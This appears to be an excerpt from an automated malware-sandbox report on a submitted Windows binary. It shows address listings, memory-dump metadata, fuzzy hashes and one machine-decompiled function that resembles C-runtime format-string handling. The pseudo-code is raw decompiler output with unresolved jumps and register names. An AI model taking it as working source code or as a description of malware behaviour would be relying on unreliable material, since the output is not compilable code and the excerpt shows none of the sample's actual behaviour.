                                                                                                                                                                                                                              0x7ff735c52330
                                                                                                                                                                                                                              0x7ff735c5233a
                                                                                                                                                                                                                              0x7ff735c5233f
                                                                                                                                                                                                                              0x7ff735c52348
                                                                                                                                                                                                                              0x7ff735c5234b
                                                                                                                                                                                                                              0x7ff735c5234b
                                                                                                                                                                                                                              0x7ff735c5234e
                                                                                                                                                                                                                              0x7ff735c5234e
                                                                                                                                                                                                                              0x7ff735c52352
                                                                                                                                                                                                                              0x7ff735c52356
                                                                                                                                                                                                                              0x7ff735c52358
                                                                                                                                                                                                                              0x7ff735c52362
                                                                                                                                                                                                                              0x7ff735c5236c
                                                                                                                                                                                                                              0x7ff735c52372
                                                                                                                                                                                                                              0x7ff735c5237c
                                                                                                                                                                                                                              0x7ff735c52386
                                                                                                                                                                                                                              0x7ff735c5238b
                                                                                                                                                                                                                              0x7ff735c52391
                                                                                                                                                                                                                              0x7ff735c52397
                                                                                                                                                                                                                              0x7ff735c523a1
                                                                                                                                                                                                                              0x7ff735c523a9
                                                                                                                                                                                                                              0x7ff735c523ae
                                                                                                                                                                                                                              0x7ff735c523b3
                                                                                                                                                                                                                              0x7ff735c523b8
                                                                                                                                                                                                                              0x7ff735c523c0
                                                                                                                                                                                                                              0x7ff735c523c5
                                                                                                                                                                                                                              0x7ff735c523ce
                                                                                                                                                                                                                              0x7ff735c523d4
                                                                                                                                                                                                                              0x7ff735c523da
                                                                                                                                                                                                                              0x7ff735c523e0
                                                                                                                                                                                                                              0x7ff735c523e6
                                                                                                                                                                                                                              0x7ff735c523ec
                                                                                                                                                                                                                              0x7ff735c523f2
                                                                                                                                                                                                                              0x7ff735c523f7
                                                                                                                                                                                                                              0x7ff735c523fb
                                                                                                                                                                                                                              0x7ff735c523fd
                                                                                                                                                                                                                              0x7ff735c52402
                                                                                                                                                                                                                              0x7ff735c52404
                                                                                                                                                                                                                              0x7ff735c5240b
                                                                                                                                                                                                                              0x7ff735c52412
                                                                                                                                                                                                                              0x7ff735c52414
                                                                                                                                                                                                                              0x7ff735c5241f
                                                                                                                                                                                                                              0x7ff735c52421
                                                                                                                                                                                                                              0x7ff735c52425
                                                                                                                                                                                                                              0x7ff735c5242a
                                                                                                                                                                                                                              0x7ff735c5242d
                                                                                                                                                                                                                              0x7ff735c52432
                                                                                                                                                                                                                              0x7ff735c52434
                                                                                                                                                                                                                              0x7ff735c52439
                                                                                                                                                                                                                              0x7ff735c5243b
                                                                                                                                                                                                                              0x7ff735c52441
                                                                                                                                                                                                                              0x7ff735c52446
                                                                                                                                                                                                                              0x7ff735c52451
                                                                                                                                                                                                                              0x7ff735c52455
                                                                                                                                                                                                                              0x7ff735c5245e
                                                                                                                                                                                                                              0x7ff735c52464
                                                                                                                                                                                                                              0x7ff735c52469
                                                                                                                                                                                                                              0x7ff735c52470
                                                                                                                                                                                                                              0x7ff735c52475
                                                                                                                                                                                                                              0x7ff735c52483
                                                                                                                                                                                                                              0x7ff735c5248d
                                                                                                                                                                                                                              0x7ff735c52493
                                                                                                                                                                                                                              0x7ff735c52498
                                                                                                                                                                                                                              0x7ff735c5249d
                                                                                                                                                                                                                              0x7ff735c524a4
                                                                                                                                                                                                                              0x7ff735c524ad
                                                                                                                                                                                                                              0x7ff735c524af
                                                                                                                                                                                                                              0x7ff735c524b5
                                                                                                                                                                                                                              0x7ff735c524b8
                                                                                                                                                                                                                              0x7ff735c524bd
                                                                                                                                                                                                                              0x7ff735c524ce
                                                                                                                                                                                                                              0x7ff735c524d2
                                                                                                                                                                                                                              0x7ff735c524db
                                                                                                                                                                                                                              0x7ff735c524dd
                                                                                                                                                                                                                              0x7ff735c524e4
                                                                                                                                                                                                                              0x7ff735c524f4
                                                                                                                                                                                                                              0x7ff735c524f8
                                                                                                                                                                                                                              0x7ff735c524fa
                                                                                                                                                                                                                              0x7ff735c52504
                                                                                                                                                                                                                              0x7ff735c5250b
                                                                                                                                                                                                                              0x7ff735c52510
                                                                                                                                                                                                                              0x7ff735c5251e
                                                                                                                                                                                                                              0x7ff735c52524
                                                                                                                                                                                                                              0x7ff735c52526
                                                                                                                                                                                                                              0x7ff735c5252b
                                                                                                                                                                                                                              0x7ff735c52530
                                                                                                                                                                                                                              0x7ff735c5253f
                                                                                                                                                                                                                              0x7ff735c52545
                                                                                                                                                                                                                              0x7ff735c52549
                                                                                                                                                                                                                              0x7ff735c5254e
                                                                                                                                                                                                                              0x7ff735c52551
                                                                                                                                                                                                                              0x7ff735c52556
                                                                                                                                                                                                                              0x7ff735c52559
                                                                                                                                                                                                                              0x7ff735c52567
                                                                                                                                                                                                                              0x7ff735c52572
                                                                                                                                                                                                                              0x7ff735c5257c
                                                                                                                                                                                                                              0x7ff735c5257e
                                                                                                                                                                                                                              0x7ff735c52584
                                                                                                                                                                                                                              0x7ff735c5258a
                                                                                                                                                                                                                              0x7ff735c5258e
                                                                                                                                                                                                                              0x7ff735c52591
                                                                                                                                                                                                                              0x7ff735c52596
                                                                                                                                                                                                                              0x7ff735c525a0
                                                                                                                                                                                                                              0x7ff735c525a8
                                                                                                                                                                                                                              0x7ff735c525b8
                                                                                                                                                                                                                              0x7ff735c525c0
                                                                                                                                                                                                                              0x7ff735c525c2
                                                                                                                                                                                                                              0x7ff735c525c7
                                                                                                                                                                                                                              0x7ff735c525cb
                                                                                                                                                                                                                              0x7ff735c525d6
                                                                                                                                                                                                                              0x7ff735c525dc
                                                                                                                                                                                                                              0x7ff735c525e0
                                                                                                                                                                                                                              0x7ff735c525e5
                                                                                                                                                                                                                              0x7ff735c525e7
                                                                                                                                                                                                                              0x7ff735c525ec
                                                                                                                                                                                                                              0x7ff735c525ee
                                                                                                                                                                                                                              0x7ff735c525f8
                                                                                                                                                                                                                              0x7ff735c525ff
                                                                                                                                                                                                                              0x7ff735c52608
                                                                                                                                                                                                                              0x7ff735c5260a
                                                                                                                                                                                                                              0x7ff735c52610
                                                                                                                                                                                                                              0x7ff735c52616
                                                                                                                                                                                                                              0x7ff735c52621
                                                                                                                                                                                                                              0x7ff735c52627
                                                                                                                                                                                                                              0x7ff735c5262f
                                                                                                                                                                                                                              0x7ff735c52634
                                                                                                                                                                                                                              0x7ff735c52640
                                                                                                                                                                                                                              0x7ff735c52645
                                                                                                                                                                                                                              0x7ff735c52650
                                                                                                                                                                                                                              0x7ff735c52661
                                                                                                                                                                                                                              0x7ff735c52666
                                                                                                                                                                                                                              0x7ff735c5266e
                                                                                                                                                                                                                              0x7ff735c52670
                                                                                                                                                                                                                              0x7ff735c52680
                                                                                                                                                                                                                              0x7ff735c52686
                                                                                                                                                                                                                              0x7ff735c52688
                                                                                                                                                                                                                              0x7ff735c5268c
                                                                                                                                                                                                                              0x7ff735c5268e
                                                                                                                                                                                                                              0x7ff735c52692
                                                                                                                                                                                                                              0x7ff735c52694
                                                                                                                                                                                                                              0x7ff735c52698
                                                                                                                                                                                                                              0x7ff735c526a2
                                                                                                                                                                                                                              0x7ff735c526a8
                                                                                                                                                                                                                              0x7ff735c526b5
                                                                                                                                                                                                                              0x7ff735c526b9
                                                                                                                                                                                                                              0x7ff735c526bf
                                                                                                                                                                                                                              0x7ff735c526c3
                                                                                                                                                                                                                              0x7ff735c526ce
                                                                                                                                                                                                                              0x7ff735c526d0
                                                                                                                                                                                                                              0x7ff735c526d5
                                                                                                                                                                                                                              0x7ff735c526d7
                                                                                                                                                                                                                              0x7ff735c526e2
                                                                                                                                                                                                                              0x7ff735c526e8
                                                                                                                                                                                                                              0x7ff735c526ec
                                                                                                                                                                                                                              0x7ff735c526ee
                                                                                                                                                                                                                              0x7ff735c526f2
                                                                                                                                                                                                                              0x7ff735c526fb
                                                                                                                                                                                                                              0x7ff735c526ff
                                                                                                                                                                                                                              0x7ff735c52706
                                                                                                                                                                                                                              0x7ff735c5270b
                                                                                                                                                                                                                              0x7ff735c52710
                                                                                                                                                                                                                              0x7ff735c52715
                                                                                                                                                                                                                              0x7ff735c52717
                                                                                                                                                                                                                              0x7ff735c5271c
                                                                                                                                                                                                                              0x7ff735c5271e
                                                                                                                                                                                                                              0x7ff735c52728
                                                                                                                                                                                                                              0x7ff735c5272f
                                                                                                                                                                                                                              0x7ff735c52738
                                                                                                                                                                                                                              0x7ff735c5273a
                                                                                                                                                                                                                              0x7ff735c52740
                                                                                                                                                                                                                              0x7ff735c5276f

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: a2d6897f29ed5b9e9e9c7dbdf17de23861d0bbce301b8c27a608bfcfc7e79109
                                                                                                                                                                                                                              • Instruction ID: 7bf3be46c2289208407f7e480b10f4fcc0d7cbde39929eedb0e2feb977557b28
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2d6897f29ed5b9e9e9c7dbdf17de23861d0bbce301b8c27a608bfcfc7e79109
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFD1B0A3A0860792EB69AF96805017DB7E1FB04F4CFD45936DE4D43294DF2DE842E361
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C51F48 Relevance: .3, Instructions: 317COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                                                                              			E00007FF77FF735C51F48(void* __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				char _v68;
				char _v70;
				signed int _v72;
				long long _v88;
				void* __rbp;
				intOrPtr _t108;
				void* _t111;
				void* _t140;
				unsigned int _t147;
				signed char _t148;
				unsigned int _t153;
				signed int _t159;
				void* _t169;
				void* _t172;
				void* _t173;
				signed long long _t231;
				void* _t247;
				intOrPtr* _t252;
				intOrPtr* _t256;
				void* _t261;
				intOrPtr _t264;
				intOrPtr _t268;
				signed int* _t270;
				void* _t274;
				void* _t275;
				intOrPtr _t279;
				void* _t286;
				intOrPtr* _t287;

				_t272 = __rsi;
				_t169 = __edi;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t274 = _t275;
				_t276 = _t275 - 0x50;
				_t231 =  *0x35c7b008; // 0x861d85c91f07
				_v56 = _t231 ^ _t275 - 0x00000050;
				_t108 =  *((intOrPtr*)(__rcx + 0x39));
				_t247 = __rcx;
				r13d = 1;
				dil = 0x78;
				sil = 0x58;
				r14b = 0x41;
				_t173 = _t108 - 0x64;
				if (_t173 > 0) goto 0x35c51feb;
				if (_t173 == 0) goto 0x35c5204e;
				if (_t108 == r14b) goto 0x35c5205b;
				if (_t108 == 0x43) goto 0x35c51fce;
				if (_t108 - 0x44 <= 0) goto 0x35c52064;
				if (_t108 - 0x47 <= 0) goto 0x35c5205b;
				if (_t108 == 0x53) goto 0x35c52010;
				if (_t108 == sil) goto 0x35c51fe1;
				if (_t108 == 0x5a) goto 0x35c51fda;
				if (_t108 == 0x61) goto 0x35c5205b;
				if (_t108 != 0x63) goto 0x35c52064;
				E00007FF77FF735C52D10(_t108, _t108 - 0x63, __rcx);
				goto 0x35c52060;
				E00007FF77FF735C52770(__rcx);
				goto 0x35c52060;
				_t111 = E00007FF77FF735C5093C(r13b, __rcx, __rcx, __rsi, _t274);
				goto 0x35c52060;
				if (_t111 - 0x67 <= 0) goto 0x35c5205b;
				if (_t111 == 0x69) goto 0x35c5204e;
				if (_t111 == 0x6e) goto 0x35c52047;
				if (_t111 == 0x6f) goto 0x35c52027;
				if (_t111 == 0x70) goto 0x35c52017;
				if (_t111 == 0x73) goto 0x35c52010;
				if (_t111 == 0x75) goto 0x35c52052;
				if (_t111 != dil) goto 0x35c52064;
				goto 0x35c51fe4;
				E00007FF77FF735C52F4C(__rcx);
				goto 0x35c52060;
				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
				goto 0x35c51fe1;
				_t147 =  *(__rcx + 0x28);
				if ((r13b & _t147 >> 0x00000005) == 0) goto 0x35c5203b;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x28) = _t147;
				E00007FF77FF735C50194(0, __rcx, __rcx, _t272, _t274);
				goto 0x35c52060;
				E00007FF77FF735C52E98(__rcx, __rcx);
				goto 0x35c52060;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
				E00007FF77FF735C50568(0, __rcx, __rcx, _t272, _t274);
				goto 0x35c52060;
				if (E00007FF77FF735C52864(0, _t169, __rcx, __rcx, _t272, _t274) != 0) goto 0x35c5206b;
				goto 0x35c522ea;
				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x35c522e7;
				_t148 =  *(__rcx + 0x28);
				_v72 = 0;
				_v70 = 0;
				if ((r13b & 0) == 0) goto 0x35c520b8;
				if ((r13b & 0) == 0) goto 0x35c5209d;
				_v72 = 0x2d;
				goto 0x35c520b5;
				if ((r13b & _t148) == 0) goto 0x35c520a8;
				_v72 = 0x2b;
				goto 0x35c520b5;
				if ((r13b & 0) == 0) goto 0x35c520b8;
				_v72 = 0x20;
				_t261 = _t286;
				r8b =  *((intOrPtr*)(__rcx + 0x39));
				if ((r8b - sil & 0x000000df) != 0) goto 0x35c520d5;
				if ((r13b & _t148 >> 0x00000005) == 0) goto 0x35c520d5;
				r9b = r13b;
				goto 0x35c520d8;
				r9b = 0;
				_t132 = r8b - r14b;
				if (r9b != 0) goto 0x35c520ec;
				if ((r8b - r14b & 0xffffff00 | (_t132 & 0x000000df) == 0x00000000) == 0) goto 0x35c52107;
				 *((char*)(_t274 + _t261 - 0x20)) = 0x30;
				if (r8b == sil) goto 0x35c520fb;
				if (r8b != r14b) goto 0x35c520fe;
				dil = sil;
				 *((intOrPtr*)(_t274 + _t261 - 0x1f)) = dil;
				_t172 =  *((intOrPtr*)(__rcx + 0x2c)) -  *((intOrPtr*)(__rcx + 0x48));
				if ((_t148 & 0x0000000c) != 0) goto 0x35c52173;
				r9d = 0;
				if (_t172 <= 0) goto 0x35c52173;
				_t279 =  *((intOrPtr*)(__rcx + 0x460));
				if ( *((intOrPtr*)(_t279 + 0x10)) !=  *((intOrPtr*)(_t279 + 8))) goto 0x35c52142;
				if ( *((char*)(_t279 + 0x18)) == 0) goto 0x35c5213a;
				goto 0x35c5213d;
				 *(__rcx + 0x20) =  *(__rcx + 0x20) + 0x00000001 | 0xffffffff;
				goto 0x35c52166;
				 *(__rcx + 0x20) = __rcx + 1;
				 *((intOrPtr*)(_t279 + 0x10)) =  *((intOrPtr*)(_t279 + 0x10)) + _t286;
				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))))) = 0x20;
				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) + _t286;
				if ( *(__rcx + 0x20) == 0xffffffff) goto 0x35c52173;
				r9d = r9d + r13d;
				if (r9d - _t172 < 0) goto 0x35c5211e;
				_t60 = _t247 + 0x20; // 0x98
				_t270 = _t60;
				r8d = 0;
				_v88 =  *((intOrPtr*)(__rcx + 8));
				_t62 = _t247 + 0x460; // 0x4d8
				_t287 = _t62;
				_t252 = _t287;
				E00007FF77FF735C53178(__rcx + 1, _t169, _t172, __rcx, _t252, _t270, _t272, _t274, _t270);
				_t153 =  *(__rcx + 0x28);
				if ((r13b & _t153 >> 0x00000003) == 0) goto 0x35c521fc;
				if ((r13b & _t153 >> 0x00000002) != 0) goto 0x35c521fc;
				r8d = 0;
				if (_t172 <= 0) goto 0x35c521fc;
				_t264 =  *_t287;
				if ( *((intOrPtr*)(_t264 + 0x10)) !=  *((intOrPtr*)(_t264 + 8))) goto 0x35c521d5;
				if ( *((char*)(_t264 + 0x18)) == 0) goto 0x35c521ce;
				goto 0x35c521d1;
				 *_t270 =  *_t270 + 0x00000001 | 0xffffffff;
				goto 0x35c521ef;
				 *_t270 = _t252 + 1;
				 *((intOrPtr*)(_t264 + 0x10)) =  *((intOrPtr*)(_t264 + 0x10)) + _t286;
				 *((char*)( *((intOrPtr*)( *_t287)))) = 0x30;
				 *((intOrPtr*)( *_t287)) =  *((intOrPtr*)( *_t287)) + _t286;
				if ( *_t270 == 0xffffffff) goto 0x35c521fc;
				r8d = r8d + r13d;
				if (r8d - _t172 < 0) goto 0x35c521b7;
				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x35c5226e;
				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x35c5226e;
				r14d = 0;
				_t79 =  &_v68; // -27
				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
				_t80 =  &_v72; // -31
				_v72 = _v72 & 0x00000000;
				r8d = 6;
				_v88 =  *((intOrPtr*)(__rcx + 8));
				if (E00007FF77FF735C5D090( *((intOrPtr*)(__rcx + 8)), __rcx, _t80, _t79, _t274, _t279) != 0) goto 0x35c52269;
				r8d = _v72;
				if (r8d == 0) goto 0x35c52269;
				_v88 =  *((intOrPtr*)(_t247 + 8));
				_t140 = E00007FF77FF735C53178(_t139, _t169, _t172, _t247, _t287, _t270, _t272, _t274, _t270);
				r14d = r14d + r13d;
				if (r14d !=  *(_t247 + 0x48)) goto 0x35c5220f;
				goto 0x35c5228a;
				 *_t270 =  *_t270 | 0xffffffff;
				goto 0x35c5228a;
				r8d =  *(_t247 + 0x48);
				_t256 = _t287;
				_v88 =  *((intOrPtr*)(_t247 + 8));
				E00007FF77FF735C53178(_t140, _t169, _t172, _t247, _t256, _t270, _t272, _t274, _t270);
				_t159 =  *_t270;
				if (_t159 < 0) goto 0x35c522e7;
				if ((r13b &  *(_t247 + 0x28) >> 0x00000002) == 0) goto 0x35c522e7;
				r8d = 0;
				if (_t172 <= 0) goto 0x35c522e7;
				_t268 =  *_t287;
				if ( *((intOrPtr*)(_t268 + 0x10)) !=  *((intOrPtr*)(_t268 + 8))) goto 0x35c522c0;
				if ( *((char*)(_t268 + 0x18)) == 0) goto 0x35c522b9;
				goto 0x35c522bc;
				 *_t270 = _t159 + 0x00000001 | 0xffffffff;
				goto 0x35c522da;
				 *_t270 = _t256 + 1;
				 *((intOrPtr*)(_t268 + 0x10)) =  *((intOrPtr*)(_t268 + 0x10)) + _t286;
				 *((char*)( *((intOrPtr*)( *_t287)))) = 0x20;
				 *((intOrPtr*)( *_t287)) =  *((intOrPtr*)( *_t287)) + _t286;
				if ( *_t270 == 0xffffffff) goto 0x35c522e7;
				r8d = r8d + r13d;
				if (r8d - _t172 < 0) goto 0x35c522a2;
				return E00007FF77FF735C4A410(r13b,  *_t270, _v56 ^ _t276);
			}

































                                                                                                                                                                                                                              0x7ff735c51f48
                                                                                                                                                                                                                              0x7ff735c51f48
                                                                                                                                                                                                                              0x7ff735c51f48
                                                                                                                                                                                                                              0x7ff735c51f4d
                                                                                                                                                                                                                              0x7ff735c51f52
                                                                                                                                                                                                                              0x7ff735c51f60
                                                                                                                                                                                                                              0x7ff735c51f63
                                                                                                                                                                                                                              0x7ff735c51f67
                                                                                                                                                                                                                              0x7ff735c51f71
                                                                                                                                                                                                                              0x7ff735c51f75
                                                                                                                                                                                                                              0x7ff735c51f78
                                                                                                                                                                                                                              0x7ff735c51f7b
                                                                                                                                                                                                                              0x7ff735c51f81
                                                                                                                                                                                                                              0x7ff735c51f84
                                                                                                                                                                                                                              0x7ff735c51f87
                                                                                                                                                                                                                              0x7ff735c51f8a
                                                                                                                                                                                                                              0x7ff735c51f8c
                                                                                                                                                                                                                              0x7ff735c51f8e
                                                                                                                                                                                                                              0x7ff735c51f97
                                                                                                                                                                                                                              0x7ff735c51f9f
                                                                                                                                                                                                                              0x7ff735c51fa3
                                                                                                                                                                                                                              0x7ff735c51fab
                                                                                                                                                                                                                              0x7ff735c51fb3
                                                                                                                                                                                                                              0x7ff735c51fb8
                                                                                                                                                                                                                              0x7ff735c51fbc
                                                                                                                                                                                                                              0x7ff735c51fc0
                                                                                                                                                                                                                              0x7ff735c51fc8
                                                                                                                                                                                                                              0x7ff735c51fd0
                                                                                                                                                                                                                              0x7ff735c51fd5
                                                                                                                                                                                                                              0x7ff735c51fda
                                                                                                                                                                                                                              0x7ff735c51fdf
                                                                                                                                                                                                                              0x7ff735c51fe4
                                                                                                                                                                                                                              0x7ff735c51fe9
                                                                                                                                                                                                                              0x7ff735c51fed
                                                                                                                                                                                                                              0x7ff735c51ff1
                                                                                                                                                                                                                              0x7ff735c51ff5
                                                                                                                                                                                                                              0x7ff735c51ff9
                                                                                                                                                                                                                              0x7ff735c51ffd
                                                                                                                                                                                                                              0x7ff735c52001
                                                                                                                                                                                                                              0x7ff735c52005
                                                                                                                                                                                                                              0x7ff735c5200a
                                                                                                                                                                                                                              0x7ff735c5200e
                                                                                                                                                                                                                              0x7ff735c52010
                                                                                                                                                                                                                              0x7ff735c52015
                                                                                                                                                                                                                              0x7ff735c52017
                                                                                                                                                                                                                              0x7ff735c5201e
                                                                                                                                                                                                                              0x7ff735c52025
                                                                                                                                                                                                                              0x7ff735c52027
                                                                                                                                                                                                                              0x7ff735c52032
                                                                                                                                                                                                                              0x7ff735c52034
                                                                                                                                                                                                                              0x7ff735c52038
                                                                                                                                                                                                                              0x7ff735c52040
                                                                                                                                                                                                                              0x7ff735c52045
                                                                                                                                                                                                                              0x7ff735c52047
                                                                                                                                                                                                                              0x7ff735c5204c
                                                                                                                                                                                                                              0x7ff735c5204e
                                                                                                                                                                                                                              0x7ff735c52054
                                                                                                                                                                                                                              0x7ff735c52059
                                                                                                                                                                                                                              0x7ff735c52062
                                                                                                                                                                                                                              0x7ff735c52066
                                                                                                                                                                                                                              0x7ff735c5206f
                                                                                                                                                                                                                              0x7ff735c52075
                                                                                                                                                                                                                              0x7ff735c5207a
                                                                                                                                                                                                                              0x7ff735c52080
                                                                                                                                                                                                                              0x7ff735c5208b
                                                                                                                                                                                                                              0x7ff735c52095
                                                                                                                                                                                                                              0x7ff735c52097
                                                                                                                                                                                                                              0x7ff735c5209b
                                                                                                                                                                                                                              0x7ff735c520a0
                                                                                                                                                                                                                              0x7ff735c520a2
                                                                                                                                                                                                                              0x7ff735c520a6
                                                                                                                                                                                                                              0x7ff735c520af
                                                                                                                                                                                                                              0x7ff735c520b1
                                                                                                                                                                                                                              0x7ff735c520b5
                                                                                                                                                                                                                              0x7ff735c520b8
                                                                                                                                                                                                                              0x7ff735c520c4
                                                                                                                                                                                                                              0x7ff735c520ce
                                                                                                                                                                                                                              0x7ff735c520d0
                                                                                                                                                                                                                              0x7ff735c520d3
                                                                                                                                                                                                                              0x7ff735c520d5
                                                                                                                                                                                                                              0x7ff735c520db
                                                                                                                                                                                                                              0x7ff735c520e6
                                                                                                                                                                                                                              0x7ff735c520ea
                                                                                                                                                                                                                              0x7ff735c520ec
                                                                                                                                                                                                                              0x7ff735c520f4
                                                                                                                                                                                                                              0x7ff735c520f9
                                                                                                                                                                                                                              0x7ff735c520fb
                                                                                                                                                                                                                              0x7ff735c520fe
                                                                                                                                                                                                                              0x7ff735c5210c
                                                                                                                                                                                                                              0x7ff735c52112
                                                                                                                                                                                                                              0x7ff735c52114
                                                                                                                                                                                                                              0x7ff735c52119
                                                                                                                                                                                                                              0x7ff735c5211e
                                                                                                                                                                                                                              0x7ff735c5212d
                                                                                                                                                                                                                              0x7ff735c52134
                                                                                                                                                                                                                              0x7ff735c52138
                                                                                                                                                                                                                              0x7ff735c5213d
                                                                                                                                                                                                                              0x7ff735c52140
                                                                                                                                                                                                                              0x7ff735c52145
                                                                                                                                                                                                                              0x7ff735c52148
                                                                                                                                                                                                                              0x7ff735c52156
                                                                                                                                                                                                                              0x7ff735c52160
                                                                                                                                                                                                                              0x7ff735c52169
                                                                                                                                                                                                                              0x7ff735c5216b
                                                                                                                                                                                                                              0x7ff735c52171
                                                                                                                                                                                                                              0x7ff735c52177
                                                                                                                                                                                                                              0x7ff735c52177
                                                                                                                                                                                                                              0x7ff735c5217b
                                                                                                                                                                                                                              0x7ff735c5217e
                                                                                                                                                                                                                              0x7ff735c52183
                                                                                                                                                                                                                              0x7ff735c52183
                                                                                                                                                                                                                              0x7ff735c5218d
                                                                                                                                                                                                                              0x7ff735c52194
                                                                                                                                                                                                                              0x7ff735c52199
                                                                                                                                                                                                                              0x7ff735c521a4
                                                                                                                                                                                                                              0x7ff735c521ac
                                                                                                                                                                                                                              0x7ff735c521ae
                                                                                                                                                                                                                              0x7ff735c521b3
                                                                                                                                                                                                                              0x7ff735c521b7
                                                                                                                                                                                                                              0x7ff735c521c2
                                                                                                                                                                                                                              0x7ff735c521c8
                                                                                                                                                                                                                              0x7ff735c521cc
                                                                                                                                                                                                                              0x7ff735c521d1
                                                                                                                                                                                                                              0x7ff735c521d3
                                                                                                                                                                                                                              0x7ff735c521d8
                                                                                                                                                                                                                              0x7ff735c521da
                                                                                                                                                                                                                              0x7ff735c521e4
                                                                                                                                                                                                                              0x7ff735c521ea
                                                                                                                                                                                                                              0x7ff735c521f2
                                                                                                                                                                                                                              0x7ff735c521f4
                                                                                                                                                                                                                              0x7ff735c521fa
                                                                                                                                                                                                                              0x7ff735c52200
                                                                                                                                                                                                                              0x7ff735c52206
                                                                                                                                                                                                                              0x7ff735c5220c
                                                                                                                                                                                                                              0x7ff735c52213
                                                                                                                                                                                                                              0x7ff735c52217
                                                                                                                                                                                                                              0x7ff735c5221c
                                                                                                                                                                                                                              0x7ff735c52220
                                                                                                                                                                                                                              0x7ff735c52229
                                                                                                                                                                                                                              0x7ff735c5222f
                                                                                                                                                                                                                              0x7ff735c5223b
                                                                                                                                                                                                                              0x7ff735c5223d
                                                                                                                                                                                                                              0x7ff735c52244
                                                                                                                                                                                                                              0x7ff735c52251
                                                                                                                                                                                                                              0x7ff735c52259
                                                                                                                                                                                                                              0x7ff735c5225e
                                                                                                                                                                                                                              0x7ff735c52265
                                                                                                                                                                                                                              0x7ff735c52267
                                                                                                                                                                                                                              0x7ff735c52269
                                                                                                                                                                                                                              0x7ff735c5226c
                                                                                                                                                                                                                              0x7ff735c52275
                                                                                                                                                                                                                              0x7ff735c52279
                                                                                                                                                                                                                              0x7ff735c52280
                                                                                                                                                                                                                              0x7ff735c52285
                                                                                                                                                                                                                              0x7ff735c5228a
                                                                                                                                                                                                                              0x7ff735c5228e
                                                                                                                                                                                                                              0x7ff735c52299
                                                                                                                                                                                                                              0x7ff735c5229b
                                                                                                                                                                                                                              0x7ff735c522a0
                                                                                                                                                                                                                              0x7ff735c522a2
                                                                                                                                                                                                                              0x7ff735c522ad
                                                                                                                                                                                                                              0x7ff735c522b3
                                                                                                                                                                                                                              0x7ff735c522b7
                                                                                                                                                                                                                              0x7ff735c522bc
                                                                                                                                                                                                                              0x7ff735c522be
                                                                                                                                                                                                                              0x7ff735c522c3
                                                                                                                                                                                                                              0x7ff735c522c5
                                                                                                                                                                                                                              0x7ff735c522cf
                                                                                                                                                                                                                              0x7ff735c522d5
                                                                                                                                                                                                                              0x7ff735c522dd
                                                                                                                                                                                                                              0x7ff735c522df
                                                                                                                                                                                                                              0x7ff735c522e5
                                                                                                                                                                                                                              0x7ff735c52313

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
